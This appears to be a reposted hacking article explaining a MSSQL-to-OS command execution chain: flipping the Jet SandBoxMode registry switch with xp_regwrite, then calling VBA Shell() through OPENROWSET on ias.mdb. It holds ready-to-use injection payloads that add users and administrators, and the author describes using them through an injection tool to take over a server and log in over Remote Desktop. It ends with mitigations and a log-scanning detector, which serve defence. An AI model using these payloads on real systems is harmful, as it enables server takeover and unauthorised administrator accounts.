[SQL Server] [access] Sandbox Vulnerability

Source: Internet
Author: User
Tags: mssql server

The article "The Jet engine can call VBA's Shell() function" (http://www.520hack.com) explains that Shell() can be invoked directly from an Access SQL query. I first tested this inside Access with the following SQL statement:

Select shell('C:\Windows\system32\cmd.exe /C net user Ray 123 /add');

Opening Computer Management > Local Users and Groups immediately shows a new user named Ray, so the statement executed. Next I wrote a VBScript that connects to an MDB through ADO and runs the same SQL:

Set conn = CreateObject("ADODB.Connection")
conn.Open "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=test.mdb"
Set rs = conn.Execute("select shell(""cmd.exe /C net user Ray 123 /add"")")
MsgBox rs(0)

Running it produces the error "Undefined function 'shell' in expression". The same article explains why: the Jet engine has a switch named SandBoxMode, stored in the registry as a REG_DWORD at HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Jet\4.0\Engines\SandBoxMode. Its values are: 0, the sandbox is disabled for every caller; 1, the sandbox is enabled only inside Access; 2, the sandbox is disabled inside Access but enabled for every other application (the default); 3, the sandbox is always enabled. With the default of 2, VBA's Shell() can only be called from inside Access itself, which is why the query worked in Access but failed from VBScript. After changing the value to 0 and rerunning, the VBScript succeeds: through the Jet engine, any caller can now invoke VBA's Shell() to execute system commands.

The Jet engine is present on practically every machine running MSSQL Server (it ships with MDAC), so a connection with sysadmin (sa) rights is enough to change this switch, because MSSQL exposes an extended stored procedure, xp_regwrite, that writes registry values. By default only sysadmin can execute it; db_owner of a user database is not sufficient. Its syntax is:

Exec master.dbo.xp_regwrite 'root_key', 'subkey', 'value_name', 'value_type', value

Given an SQL injection point whose database connection runs as sa, the following injection statement can be constructed:

Injectionurl;exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0--

This sets SandBoxMode to 0. From then on, anything that connects to an Access database can execute system commands: an injection point in an Access-backed application, or an ASP page whose select we control, can call VBA's Shell() directly.

But MSSQL itself has the OPENROWSET function, which opens an arbitrary OLE DB data source, so with an sa connection we can make the Jet engine open an Access database for us. We do not even need our own MDB: searching the system files turns up two Access databases shipped in the Windows system directory, %WINDIR%\system32\ias\ias.mdb and %WINDIR%\system32\ias\dnary.mdb. That gives the following injection statement:

Injectionurl';select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("net user Ray 123 /add")')--

If the details are unclear, here is the chain in simplified form:

1. Access (the Jet engine) can call VBA's Shell() function and run any command with the privileges of the calling process; when the call comes through MSSQL, that is the SQL Server service account, often LocalSystem.

2. A switch must be set before anything other than Access can use Shell().

3. That switch lives in the registry (SandBoxMode).

4. sa can write the registry through xp_regwrite.

5. Use sa's registry write to flip the switch.

6. Use MSSQL's OPENROWSET to open an Access database and call Shell(), executing any command with the service account's privileges.

So today I used HDSI (an SQL injection tool) to send the following commands through the injection point:

exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0

select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("net user zyqq 123 /add")')

select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("net localgroup administrators zyqq /add")')

Finally, the new user logs on over Remote Desktop (port 3389) without any problem.

Mitigations follow directly from the chain: do not let web applications connect as sa or any sysadmin login; leave xp_regwrite restricted to sysadmin (or drop it); set SandBoxMode to 3 so Shell() is blocked for every caller; and disable ad hoc distributed queries (OPENROWSET/OPENDATASOURCE) for the Jet provider so the server cannot be made to open an MDB on the attacker's behalf.
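On the detection side, here is an added example that is not part of the original article and not code from HDSI: a small scanner that normalises web-server request lines the way an injection tool encodes the payloads above (URL encoding, double encoding, '+' for space, /**/ comment padding) and flags the two halves of the chain, an xp_regwrite aimed at SandBoxMode and an OPENROWSET through the Jet provider that calls Shell(). The log lines are constructed for the example, and the IIS-like field layout (date, time, method, URI, query, status) is an assumption; only the query portion matters to the rules.

```python
"""Detect the Jet SandBoxMode / OPENROWSET-Shell() injection chain in web logs.

Added example, not code from the original article or from HDSI.  Rules:
  xp_regwrite          - any call to the registry-writing extended procedure
  jet_sandbox_write    - xp_regwrite whose target value is Jet's SandBoxMode
  jet_shell_openrowset - OPENROWSET through the Jet provider invoking Shell()
"""
import re
from urllib.parse import unquote_plus

# Constructed sample request lines in an assumed IIS-like layout
# (date time method uri query status); the payloads mirror the article.
SAMPLE_LOGS = [
    # 0: plain xp_regwrite flipping SandBoxMode to 0
    "2004-05-01 10:22:31 GET /news.asp id=1;exec+master.dbo.xp_regwrite+'HKEY_LOCAL_MACHINE',"
    "'SOFTWARE%5CMicrosoft%5CJet%5C4.0%5CEngines','SandBoxMode','REG_DWORD',0-- 200",
    # 1: OPENROWSET via the Jet provider calling Shell()
    "2004-05-01 10:22:40 GET /news.asp id=1';select+*+from+openrowset('microsoft.jet.oledb.4.0',"
    "';database=c:%5Cwinnt%5Csystem32%5Cias%5Cias.mdb','select+shell(%22net+user+Ray+123+/add%22)')-- 500",
    # 2: the same registry write, double URL-encoded to slip past single decoding
    "2004-05-01 10:23:02 GET /news.asp id=1%2527%253Bexec%2520master..xp_regwrite%2520%2527HKEY_LOCAL_MACHINE%2527"
    "%252C%2527SOFTWARE%255CMicrosoft%255CJet%255C4.0%255CEngines%2527%252C%2527SandBoxMode%2527%252C%2527REG_DWORD%2527%252C0-- 200",
    # 3: Shell() call padded with /**/ comments to break naive keyword matching
    "2004-05-01 10:23:30 GET /news.asp id=1';select+*+from+openrowset/**/('microsoft.jet.oledb.4.0',"
    "';database=c:%5Cwinnt%5Csystem32%5Cias%5Cias.mdb','select/**/shell/**/(%22cmd.exe+/c+net+localgroup+administrators+Ray+/add%22)')-- 200",
    # 4: legitimate OPENROWSET against another SQL Server (must not fire)
    "2004-05-01 10:25:00 GET /report.asp q=select+*+from+openrowset('SQLOLEDB','Server=db2;Trusted_Connection=yes','select+1') 200",
    # 5: ordinary request
    "2004-05-01 10:26:00 GET /news.asp id=5 200",
]

# Patterns are applied to the normalised (decoded, comment-stripped, lowercased) line.
RULES = {
    "xp_regwrite": re.compile(r"xp_regwrite"),
    "jet_sandbox_write": re.compile(r"xp_regwrite.*?jet.*?sandboxmode"),
    "jet_shell_openrowset": re.compile(
        r"openrowset\s*\(\s*'microsoft\.jet\.oledb.*?shell\s*\("
    ),
}


def normalize(text):
    """Decode twice (handles double encoding and '+' as space), replace /**/
    comment padding with a space, collapse whitespace and lowercase."""
    decoded = unquote_plus(unquote_plus(text))
    no_comments = re.sub(r"/\*.*?\*/", " ", decoded)
    return re.sub(r"\s+", " ", no_comments).lower()


def classify(line):
    """Return the names of all rules that match this line, in RULES order."""
    norm = normalize(line)
    return [name for name, pattern in RULES.items() if pattern.search(norm)]


def scan(lines):
    """Return (index, matched_rule_names) for every line that triggers a rule."""
    hits = []
    for index, line in enumerate(lines):
        matched = classify(line)
        if matched:
            hits.append((index, matched))
    return hits


if __name__ == "__main__":
    for index, rules in scan(SAMPLE_LOGS):
        print("line %d: %s" % (index, ", ".join(rules)))
```

Run it directly to print the hits; lines 0 and 2 trip both registry rules, lines 1 and 3 trip the Jet Shell() rule, and the SQLOLEDB request stays quiet. The rules are one signal, not a complete control: they only see what reaches the web log, so pair them with server-side auditing of xp_regwrite executions and with the registry and configuration hardening described above.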
